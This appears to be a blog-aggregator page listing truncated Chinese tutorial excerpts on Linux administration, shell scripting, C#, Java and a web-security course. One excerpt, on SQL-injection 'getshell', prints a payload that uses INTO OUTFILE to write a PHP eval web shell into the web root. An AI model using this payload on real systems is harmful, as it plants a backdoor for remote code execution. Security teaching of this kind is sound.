centos   shell脚本编程1 正则  shell脚本结构  read命令  date命令的用法  shell中的逻辑判断  if 判断文件.目录属性  shell数组简单用法 $( ) 和${ } 和$(( )) 与  sh -n  sh -x  sh -v 第三十五节课 Shebang/Sha-bang在计算机科学中, Shebang (也称为Hashbang)是一个由井号和叹号构成的字符串行(#!), 其出现在文本文件的第一行的前两个字符. 在文件中存在Shebang的情况下, 类…

centos  lamp/lnmp阶段复习 以后搬迁discuz论坛不需要重新安装,只需修改配置文件即可 安装wordpress  安装phpmyadmin  定时备份mysql两种方法  第二十五节课 wordpress下载地址:https://cn.wordpress.org/ 架构:nginx代理 +LAMP 修改Windows的hosts文件 apache的所有虚拟主机端口都是88,根据servername来区分访问哪个虚拟主机 上半节课 两台机,一台安装mysql以后搬迁discuz论…

centos  Linux系统日常管理2  tcpdump,tshark,selinux,strings命令, iptables ,crontab,TCP,UDP,ICMP,FTP网络知识 第十五节课 上半节课 tcpdumptsharkselinux strings命令 下半节课 iptablescrontab Linux抓包工具 tcpdump 没有的话需要安装:  yum install -y tcpdump tcpdump 抓包工具 只有root用户才能使用, 一般只看数据流向 而不会实…

centos 特殊权限 各种搜索命令 lsattr ,chattr,suid,sgid,sbit,file,type是否是内置命令,stat文件属性 ,whereis,locate,find,ln  内部命令和外部命令 第五节课 上半节课 特殊权限/属性 隐藏权限 lsattr chattr suid sgid sbit(stickbit) 下半节课 file  文件类型(file -i 查看文件的字符集类型,file -s 查看块设备文件的文件系统信息) type  是否是 内置命令 stat…

风炫安全web安全学习第三十五节课 文件下载和文件读取漏洞 0x03 任意文件下载漏洞 一些网站由于业务需求,往往需要提供文件下载功能,但若对用户下载的文件不做限制,则恶意用户就能够下载任意敏感文件,这就是文件下载漏洞. 漏洞产生原因 有读取文件的函数 读物文件的路径用户可控,且没有经过校验,或者校验不严格 输出文件内容 一个正常的网站,存在一个下载文件的功能,同时还会从浏览器接收文件名字 文件下载的两种方式 1.直接下载: <a href="http://www.a.com/xxx.ra…

风炫安全WEB安全学习第二十五节课 利用XSS键盘记录 XSS键盘记录 同源策略是浏览器的一个安全功能,不同源的客户端脚本在没有明确授权的情况下,不能读写对方资源.所以xyz.com下的js脚本采用ajax读取abc.com里面的文件数据是会被拒绝的. 同源策略限制了从同一个源加载的文档或脚本如何与来自另一个源的资源进行交互.这是一个用于隔离潜在恶意文件的重要安全机制. 注意,资源文件不受影响: <script src="..."> <img src="..…

(借鉴请改动) 13章收尾 13.6.分离解析技术    1.在主配置文件中改两个any         2.编辑区域配置文件,写入acl,使用match匹配                      3.建立数据配置文件并重启服务 第十四章 DHCP总结: [1]yum  install dhcp 并直接去主配置文件写配置 [2]重启服务,客户机直接自动获取或者手动即可 dhcp中继: [1]复制服务程序:cp  /lib/systemd/system/dhcrelay.service   …

第四章shell语句 (据课本和虚拟机实验排版,借鉴请改动)               4.2:shell脚本   脚本包括:脚本声明,脚本注释,脚本内容和命令 例:#!/bin/bash             //脚本声明 #  for  example          //脚本注释 pwd                           //脚本命令 ls  -al                       //脚本命令 在脚本开头    #!/bin/bash     表使用b…

格式布局 一.position:fixed 锁定位置(相对于浏览器的位置),例如有些网站的右下角的弹出窗口. 示例: 二.position:absolute 1.外层没有position:absolute(或relative):那么div相对于浏览器定位,如下图中b(距离浏览器右边框为50像素,距离下边框为20像素). 2.外层有position:absolute(或relative):那么div相对于外层边框定位,如下图中bb(距离d的右边框50像素,距离d的下边框为20像素). 示例: 三.…

Linux系统中的一切都是文件,命令就是命令文件. 命令执行分为4步: 1.路径+命令名称. 2.别名.可用alias命令创建别名. 3.内部命令. 4.外部命令.99%的情况都属于第四种.定义这些路径的变量为PATH. export命令可将一般变量提升为全局变量. Vim文本编辑器的优势:1.多数Linux系统通用.2.易掌握. Vim编辑器有3种模式: 命令模式:对文件进行复制.粘贴.剪切.删除等操作,作为输入模式与末行模式切换的桥梁. 输入模式:编辑文件内容. 末行模式:保存或退出文档.…

详情删除 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Conten…

租房表 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content…

封装 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-…

函数复习 using System;using System.Collections.Generic;using System.Linq;using System.Text;using System.Threading.Tasks; namespace hanshufuxi{ class Program { //public int bijiao(int a,int b) //{ // if (a > b) // { // return a; // } // else // { // retur…

switch语句 using System;using System.Collections.Generic;using System.Linq;using System.Text;using System.Threading.Tasks; namespace @switch{ class Program { static void Main(string[] args) { for (; ; ) { //switch case 选择语句 //int m1 = 31, m2 = 28, m3 =…

继承是对现实生活中的“分类”概念的一种模拟. 通过surper调用的基类构造方法,必须是子类构造方法中的第一个语句. 构造函数(constructor)是一种特殊的方法 .主要用来在创建对象时初始化对象, 即为对象成员变量赋初始值 .特别的一个类可以有多个构造函数 ,可根据其参数个数的不同或参数类型的不同来区分它们 即构造函数的重载.构造函数的功能主要用于在类的对象创建时定义初始化的状态.构造一个对象,先调用其构造方法,来初始化其成员函数和成员变量.子类拥有父的成员变量和成员方法,如果不调用,则…

认识哈希函数和哈希表 MD5Hash值的返回范围:0~9+a~f,是16位,故范围是0~16^16(2^64)-1, [Hash函数],又叫散列函数: Hash的性质: 1)  输入域无穷大: 2)  输出域相对固定较小: 3)  输入一样,输出一样: 4)  输入不一样,输出可能一样,也可能不一样: 5)  均匀分布在输出域中,如经典表中对17取模,使得每个桶内的长度基本一样:散列函数,如同香水在房间:Hash函数和输入的顺序无关: 第4条即是Hash碰撞的原因:多个输入对应同一个输出:这是必…

风炫安全Web安全学习第十六节课 高权限sql注入getshell sql高权限getshell 前提条件: 需要知道目标网站绝对路径 目录具有写的权限 需要当前数据库用户开启了secure_file_priv select database() into outfile '/var/www/html/1.txt' allen' union select 1,'<?php eval($_GET[w]); ?>' into outfile '/var/www/html/2.php' # site…

数字型的Sql注入 风炫安全Web安全学习第十一节课 字符型和搜索型的sql注入 风炫安全Web安全学习第十二节课 mysql报错函数注入 风炫安全Web安全学习第十三节课 CUD类型的sql注入 风炫安全Web安全学习第十四节课 Http header类型的sql注入 风炫安全Web安全学习第十五节课 基于时间和布尔型的Sql注入 SQL注入 基础知识 数字: select username,email from users where id=1; 字符串:Select id,email fr…

Python学习第五堂课推荐电影:华尔街之狼 被拯救的姜哥 阿甘正传 辛德勒的名单 肖申克的救赎 上帝之城 焦土之城 绝美之城 #上节内容: 变量 if else 注释 # """...""" '''...''' // 单引号与双引号的意义是一样的 注意: 字符串---> 单行字符串用" example" 多行字符串用 '"example"' 缩进 #本节内容:pycharm使用 IDE (集成开发环…

centos shell编程5  LANMP一键安装脚本 lamp  sed  lnmp  变量和字符串比较不能用-eq  cat > /usr/local/apache2/htdocs/index.php <<EOF重定向 shell的变量和函数命名不能有横杠  平台可以用arch命令,获取是i686还是x86_64  curl 下载   第三十九节课 上半节课 lampsed 下半节课lnmp变量和字符串比较不能用-eq cat > /usr/local/apache2/htd…

centos linux系统日常管理3  服务管理ntsysv,chkconfig,系统日志rsyslog,last ,lastb ,exec,xargs,dmesg,screen,nohup,curl,ping ,telnet,traceroute ,dig ,nc,nmap,host,nethogs   第十六节课 上半节课 ntsysvchkconfig 下半节课 rsyslog/var/log/messages/var/log/secure/var/log/maillog/var/log…

centos Linux系统日常管理1  cpuinfo cpu核数   命令 w, vmstat, uptime ,top ,kill ,ps ,free,netstat ,sar, ulimit ,lsof ,pidof 第十四节课 上半节课 wuptime 下半节课 topkill命令vmstatpsfreenetstatulimitsarlsofpidof 监控系统状态命令:w, vmstat, uptime ,top w # w 12:27:16 up 16 min (运行天数), 2…

centos Linux下磁盘管理   parted,df ,du,fdisk,partprobe,mkfs.ext4,mount,/etc/fstab,fsck,e2fsck,mk2efs,tmpfs ,nr_inodes, LVM,传统方式扩容文件系统   第七节课 fdisk 设备名 ‘p’, ‘n’, ‘d’, ‘w’, ‘q’,‘l’. partprobe mount //查看当前挂载情况 mount -a //挂载/etc/fstab mkfs.ext4 /dev/sdb1 mkfs…

风炫安全WEB安全学习第十七节课 使用Sqlmap自动化注入(一) sqlmap的使用 sqlmap 是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞并接管数据库服务器.它具有强大的检测引擎,同时有众多功能,包括数据库指纹识别.从数据库中获取数据.访问底层文件系统以及在操作系统上带内连接执行命令. 项目地址: https://github.com/sqlmapproject/sqlmap 第一步:-u "xxx" -u 参数指定地址然后进行注入 第二步 -u "…

第五节(1):OA实战之登录界面  一.登录界面布局 1.背景图片 2.文本框 3.checkbox 4.按钮 暂未实现点击切换图片效果 <RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:tools="http://schemas.android.com/tools" android:layout_width="match_parent&q…

这里列出表单设计器系列的内容,6.7.8节的内容应该在春节后才有时间出了.因为这周末就请假回老家了,准备我的结婚大事.在此提前祝大家春节快乐! 基于Extjs的web表单设计器 基于Extjs的web表单设计器 第一节 基于Extjs的web表单设计器 第二节——表单控件设计 基于Extjs的web表单设计器 第三节——控件拖放 基于Extjs的web表单设计器 第四节——控件拖放 基于Extjs的web表单设计器 第五节——数据库设计 基于Extjs的web表单设计器 第六节——界面框架设计…

centos  linux安全和调优    第四十一节课 上半节课 Linux安全 下半节课 Linux调优 2015-07-01linux安全和调优 [复制链接]--http://www.apelearn.com/bbs/thread-8172-1-1.html 内容概要: 一. Linux安全 1. Linux发行版本选择主流的,更新较快的.从官网获取安装镜像 2. 硬件和物理安全设置bios密码设置grub密码设置系统密码选择有安全保障的idc机房bios密码:不让他光盘启动,禁止他进入救…

centos   shell编程6一些工作中实践脚本   nagios监控脚本 自定义zabbix脚本 mysql备份脚本 zabbix错误日志  直接送给bc做计算  gzip  innobackupex/Xtrabackup   第四十节课 上半节课nagios监控脚本自定义zabbix脚本 下半节课mysql备份脚本zabbix错误日志直接送给bc做计算gzipinnobackupex/Xtrabackup 一. 自定义nagios监控脚本nagios:0成功, 1有问题 warning,…

JAVA GC之标记  第五节 OK,我们继续昨天最后留下的问题,什么是标记?怎么标记? 第一个问题相信大家都知道,标记就是对一些已死的对象打上记号,方便垃圾收集器的清理. 至于怎么标记,一般有两种方法:引用计数和可达性分析. 引用计数实现起来比较简单,就是给对象添加一个引用计数器,每当有一个地方引用它时就加1,引用失效时就减1,当计数器为0的时候就标记为可回收.这种判断效率很高,但是很多主流的虚拟机并没有采用这种方法,主要是因为它很难解决几个对象之间循环引用的问题,向下图这个例子这样发生循环引…